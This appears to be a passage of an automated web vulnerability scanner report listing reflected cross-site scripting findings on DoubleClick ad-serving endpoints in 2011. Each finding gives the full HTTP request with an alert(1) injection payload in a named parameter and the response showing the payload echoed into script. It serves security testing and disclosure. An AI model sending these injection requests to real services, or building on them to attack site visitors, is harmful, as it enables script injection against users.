2.32. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0dbc'-alert(1)-'91ee00ba731 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4a0dbc'-alert(1)-'91ee00ba731&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:55 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4a0dbc'-alert(1)-'91ee00ba731&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...
2.33. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae6c6"-alert(1)-"63551dfc16d was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065ae6c6"-alert(1)-"63551dfc16d&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:33 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065ae6c6"-alert(1)-"63551dfc16d&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...
2.34. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58044'-alert(1)-'2f8cdfb56d7 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=2124106558044'-alert(1)-'2f8cdfb56d7&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:38 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=2124106558044'-alert(1)-'2f8cdfb56d7&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...
2.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f266f"-alert(1)-"4a1f5865200 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-f266f"-alert(1)-"4a1f5865200&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:25 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
lo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-f266f"-alert(1)-"4a1f5865200&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...
2.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bec24'-alert(1)-'dc373f3b126 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-bec24'-alert(1)-'dc373f3b126&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:29 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-bec24'-alert(1)-'dc373f3b126&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...
2.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c35ec"-alert(1)-"5362f34c696 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=c35ec"-alert(1)-"5362f34c696 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5269
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:06:07 GMT
Expires: Mon, 09 May 2011 16:06:07 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=c35ec"-alert(1)-"5362f34c696http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...
2.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6e0a'-alert(1)-'5fda209b05 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=a6e0a'-alert(1)-'5fda209b05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5266
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:06:12 GMT
Expires: Mon, 09 May 2011 16:06:12 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=a6e0a'-alert(1)-'5fda209b05http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...
2.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe95a'-alert(1)-'2f8594908bb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!fe95a'-alert(1)-'2f8594908bb&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:12 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!fe95a'-alert(1)-'2f8594908bb&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B5784509
...[SNIP]...
2.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d04f0"-alert(1)-"94981583a31 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!d04f0"-alert(1)-"94981583a31&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=;ord=270205749? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/3032084/ns/today-entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:05:08 GMT
Content-Length: 5269

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
meyourprice_slider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004A/41000000000044824.1?!d04f0"-alert(1)-"94981583a31&&PID=8634172&UIT=A-&TargetID=21241065&AN=270205749&PG=NBCRM4&ASID=297a530128fc48fcbc08f0061cb7f596&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/17/dc/%2a/c%3B233941882%3B0-0%3B0%3B5784509
...[SNIP]...
2.41. http://ad.doubleclick.net/adj/blog.us.eonline/mm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/blog.us.eonline/mm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21af0'-alert(1)-'f4b60843494 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/blog.us.eonline/mm;tile=3;pos=3_120x60;sz=120x60;akw=;!category=default;name=;title=;ord=2613388469908386?&21af0'-alert(1)-'f4b60843494=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.eonline.com/uberblog/b239302_did_chelsea_handler_have_steal_her_man.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:04:41 GMT
Content-Length: 392

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/g;44306;0-0;0;44377126;6-120/60;0/0/0;;~okv=;tile=3;pos=3_120x60;sz=120x60;akw=;!category=default;name=;title=;;21af0'-alert(1)-'f4b60843494=1;bsg=103028;bsg=103268;bsg=103666;bsg=103667;;~sscs=%3f">
...[SNIP]...
2.42. http://ad.doubleclick.net/adj/trb.latimes/hp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.latimes/hp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4dc1'-alert(1)-'a79b64de46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/trb.latimes/hp;rs=10009;rs=10087;rs=D08734_70007;rs=D08734_70060;rs=D08734_70086;rs=D08734_70115;rs=D08734_72012;rs=D08734_72015;rs=D08734_72017;rs=D08734_72020;rs=D08734_72021;rs=D08734_72076;rs=D08734_72079;rs=D08734_72080;rs=D08734_72081;;ptype=sf;rg=ur;pos=T;dcopt=ist;sz=1x1;tile=1;u=http://www.latimes.com/;ord=83659565?&f4dc1'-alert(1)-'a79b64de46e=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.latimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 16:02:57 GMT
Content-Length: 619

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/b;44306;0-0;0;12926859;31-1/1;0/0/0;u=http://www.latimes.com/;~okv=;rs=10009;rs=10087;rs=D08734_70007;rs=D087
...[SNIP]...
